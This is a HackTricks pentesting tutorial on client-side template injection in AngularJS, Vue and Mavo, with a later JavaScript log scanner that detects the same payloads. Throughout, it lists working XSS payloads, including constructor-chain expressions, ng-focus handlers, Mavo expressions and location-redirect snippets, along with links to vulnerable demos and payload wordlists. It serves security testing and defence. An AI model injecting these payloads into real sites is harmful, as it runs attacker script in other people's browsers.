hacktricks/pentesting-web/client-side-template-injection-csti.md
2024-02-10 17:52:19 +00:00

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

Summary

It is like a Server-Side Template Injection (SSTI) but in the client: where SSTI can let you execute code on the remote server, CSTI can let you execute arbitrary JavaScript code in the victim's browser.

Testing for this vulnerability is very similar to testing for SSTI: the client-side interpreter expects an expression between double curly braces and will evaluate it. For example, inject something like {{ 7-7 }}: if the application is vulnerable you will see a 0, and if not you will see the original text: {{ 7-7 }}

AngularJS

AngularJS is a widely used JavaScript framework that interacts with HTML through attributes known as directives, a notable one being ng-app. This directive tells AngularJS to process the HTML content it covers, which enables the evaluation of JavaScript expressions placed inside double curly braces.

In scenarios where user input is dynamically inserted into the HTML body tagged with ng-app, it's possible to execute arbitrary JavaScript code. This can be achieved by leveraging the syntax of AngularJS within the input. Below are examples demonstrating how JavaScript code can be executed:

{{$on.constructor('alert(1)')()}}
{{constructor.constructor('alert(1)')()}}
<input ng-focus=$event.view.alert('XSS')>

<!-- Google Research - AngularJS -->
<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>

You can find a very basic online example of the vulnerability in AngularJS at http://jsfiddle.net/2zs2yv7o/ and in Burp Suite Academy.

{% hint style="danger" %} Angular 1.6 removed the sandbox so from this version a payload like {{constructor.constructor('alert(1)')()}} or <input ng-focus=$event.view.alert('XSS')> should work. {% endhint %}

VueJS

You can find a vulnerable Vue.js implementation at https://vue-client-side-template-injection-example.azu.now.sh/
Working payload: https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor(%27alert(%22foo%22)%27)()%7D%

And the source code of the vulnerable example at https://github.com/azu/vue-client-side-template-injection-example.

<!-- Google Research - Vue.js-->
"><div v-html="''.constructor.constructor('d=document;d.location.hash.match(\'x1\') ? `` : d.location=`//localhost/mH`')()"> aaa</div>

V3

V3 here means Vue 3. Vue evaluates expressions inside double curly braces, so when user input ends up inside a template that Vue compiles in the browser, an attacker can inject an expression that reaches the Function constructor and runs arbitrary JavaScript in the victim's browser (an XSS, not code execution on the server).

Exploiting V3

To exploit it, the attacker first needs an injection point: user input that is reflected into a client-side template. This can be found by reviewing the application's source code or by probing with an expression such as {{ 7-7 }} and checking whether it is evaluated. Once the injection point is identified, the attacker crafts a payload that the template compiler will evaluate, such as JavaScript that steals sensitive information or performs unauthorized actions on behalf of the user.

Mitigating V3

To mitigate it, follow secure coding practices when developing applications with the Vue framework: do not build templates from user input, and properly sanitize and validate any data that is rendered through client-side templates. Additionally, keep the Vue framework and any related libraries up to date, as vulnerabilities in these components can be exploited by attackers.

{{_openBlock.constructor('alert(1)')()}}

Credit: Gareth Heyes, Lewis Ardern & PwnFunction

V2

{{constructor.constructor('alert(1)')()}}

Credit: Mario Heiderich

Check more VUE payloads in https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected

Mavo

Payloads:

[7*7]
[(1,alert)(1)]
<div mv-expressions="{{ }}">{{top.alert(1)}}</div>
[self.alert(1)]
javascript:alert(1)%252f%252f..%252fcss-images
[Omglol mod 1 mod self.alert (1) andlol]
[''=''or self.alert(lol)]
<a data-mv-if='1 or self.alert(1)'>test</a>
<div data-mv-expressions="lolx lolx">lolxself.alert('lol')lolx</div>
<a href=[javascript&':alert(1)']>test</a>
[self.alert(1)mod1]

More payloads in https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations
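As an added, defender-side example that is not part of the original page, the following scanner flags the probe from the Summary ({{ 7-7 }}) and the AngularJS, Vue 2/3 and Mavo payload shapes listed above when they appear in request query strings. It assumes combined-log style lines with the request in quotes; the signature names, sample log lines and IP address are constructed for the demo.

```javascript
// Signature shapes taken from the payload families above (names are mine).
const CSTI_SIGNATURES = [
  { name: 'arith-probe', re: /(\{\{|\[)\s*\d+\s*[-+*\/]\s*\d+\s*(\}\}|\])/ },     // {{7-7}}, [7*7]
  { name: 'constructor-chain', re: /constructor\s*\.\s*constructor\s*\(/ },        // Function via constructor
  { name: 'angular-handle', re: /\$on\.constructor|\$event\.view\./ },             // AngularJS scope/event handles
  { name: 'vue3-openblock', re: /_openBlock\s*\.\s*constructor/ },                 // Vue 3 render helper
  { name: 'mavo-expr', re: /\[[^\]]*\b(self|top|window)\.\w+\s*\(|mv-expressions|data-mv-if/ },
];

// Percent-decode up to twice (payloads are often double-encoded, e.g. %252f);
// a truncated sequence such as a trailing '%' is left as-is instead of throwing.
function safeDecode(s) {
  let out = s;
  for (let i = 0; i < 2; i++) {
    try {
      const next = decodeURIComponent(out);
      if (next === out) break;
      out = next;
    } catch (e) { break; }
  }
  return out;
}

// Decoded query string of the quoted request, or '' when the request has none.
function queryOf(logLine) {
  const m = logLine.match(/"(?:GET|POST)\s+\S*?\?(\S*)\s+HTTP/);
  return m ? safeDecode(m[1]) : '';
}

// Names of every signature that fires on one log line.
function detectCsti(logLine) {
  const q = queryOf(logLine);
  return CSTI_SIGNATURES.filter(s => s.re.test(q)).map(s => s.name);
}
// Only the lines that matched, each with its signature names.
function scanLog(lines) {
  return lines.map(l => ({ line: l, hits: detectCsti(l) })).filter(r => r.hits.length > 0);
}

// Constructed access-log lines: one benign request, then one per payload family.
const SAMPLE_LOG = [
  '203.0.113.7 "GET /profile?name=alice HTTP/1.1" 200',
  '203.0.113.7 "GET /profile?name=%7B%7B7-7%7D%7D HTTP/1.1" 200',
  '203.0.113.7 "GET /?name=%7B%7Bthis.constructor.constructor(%27alert(%22foo%22)%27)()%7D%7D HTTP/1.1" 200',
  '203.0.113.7 "GET /search?q=%5Bself.alert(1)%5D HTTP/1.1" 200',
  '203.0.113.7 "GET /page?name=%7B%7B_openBlock.constructor(%27alert(1)%27)()%7D%7D HTTP/1.1" 200',
  '203.0.113.7 "GET /p?name=%3Cinput%20ng-focus%3D%24event.view.alert(%27XSS%27)%3E HTTP/1.1" 200',
];

console.log(scanLog(SAMPLE_LOG));
```

Signatures match the decoded query only, so a reflected payload inside a POST body or a header needs the same logic applied to that field.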

Brute-Force Detection List

{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}
